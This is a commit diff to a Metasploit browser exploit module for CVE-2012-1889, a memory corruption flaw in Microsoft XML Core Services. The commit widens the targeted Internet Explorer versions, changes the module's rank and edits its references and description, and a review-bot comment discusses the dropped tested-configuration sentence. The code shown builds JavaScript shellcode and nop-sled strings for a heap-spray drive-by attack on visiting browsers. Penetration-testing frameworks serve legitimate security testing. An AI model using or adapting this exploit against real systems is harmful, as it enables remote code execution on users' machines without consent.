
Additional changes

1 parent 50269c9 commit 256290c2061def22260cabf34055cc2d4dece5bb @sinn3r sinn3r committed Jun 18, 2012
Showing with 4 additions and 8 deletions.
  1. +4 −8 modules/exploits/windows/browser/msxml_get_definition_code_exec.rb
@@ -8,14 +8,14 @@
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
- Rank = NormalRanking
+ Rank = GoodRanking
include Msf::Exploit::Remote::HttpServer::HTML
include Msf::Exploit::Remote::BrowserAutopwn
autopwn_info({
:ua_name => HttpClients::IE,
:ua_minver => "6.0",
- :ua_maxver => "7.0",
+ :ua_maxver => "8.0",
:javascript => true,
:os_name => OperatingSystems::WINDOWS,
:classid => "{f6D90f11-9c73-11d3-b32e-00C04f990bb4}",
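Review bot: The declared scope is widened here (`Rank = GoodRanking`, `:ua_maxver => "8.0"`) while the Description hunk that follows drops the only sentence stating which MSXML version, browser and OS the module had been verified on, so nothing in the visible change records what the new values are based on. Anyone reading the module metadata to judge exposure to CVE-2012-1889 now has to infer the covered configurations from the Targets list, which is outside these hunks. I would replace the removed sentence rather than delete it, e.g. `Tested configurations: <browser / OS / MSXML versions taken from the Targets list>.`, and put a one-line comment above `Rank` giving the reason for the new ranking. The class body and `initialize` both continue outside the hunks shown.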
@@ -29,8 +29,7 @@ def initialize(info={})
'Description' => %q{
This module exploits a memory corruption flaw in Microsoft XML Core Services
when trying to access an uninitialized Node with the getDefinition API, which
- may corrupt memory allowing remote code execution. At the moment, this module
- only targets Microsoft XML Core Services 3.0 via IE6 and IE7 over Windows XP SP3.
+ may corrupt memory allowing remote code execution.
},
'License' => MSF_LICENSE,
'Author' =>
@@ -43,6 +42,7 @@ def initialize(info={})
'References' =>
[
[ 'CVE', '2012-1889' ],
+ [ 'BID', '53934' ],
[ 'OSVDB', '82873'],
[ 'URL', 'http://technet.microsoft.com/en-us/security/advisory/2719615' ],
[ 'URL', 'http://www.zdnet.com/blog/security/state-sponsored-attackers-using-ie-zero-day-to-hijack-gmail-accounts/12462' ],
@@ -234,7 +234,6 @@ def on_request_uri(cli, request)
js_code = Rex::Text.to_unescape(p, Rex::Arch.endian(my_target.arch))
js_nops = Rex::Text.to_unescape("\x0c"*4, Rex::Arch.endian(my_target.arch))
js_90_nops = Rex::Text.to_unescape(make_nops(4), Rex::Arch.endian(my_target.arch))
- #js_90_nops = Rex::Text.to_unescape("\x0c"*4, Rex::Arch.endian(my_target.arch))
if my_target['Rop'].nil?
js_shellcode = "var shellcode = offset + code + nops.substring(0, 0x800-code.length-offset.length);"
@@ -322,9 +321,6 @@ def on_request_uri(cli, request)
end
=begin
-
-* Crash on Windows XP SP3 - msxml3.dll 8.90.1101.0
-
(e34.358): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
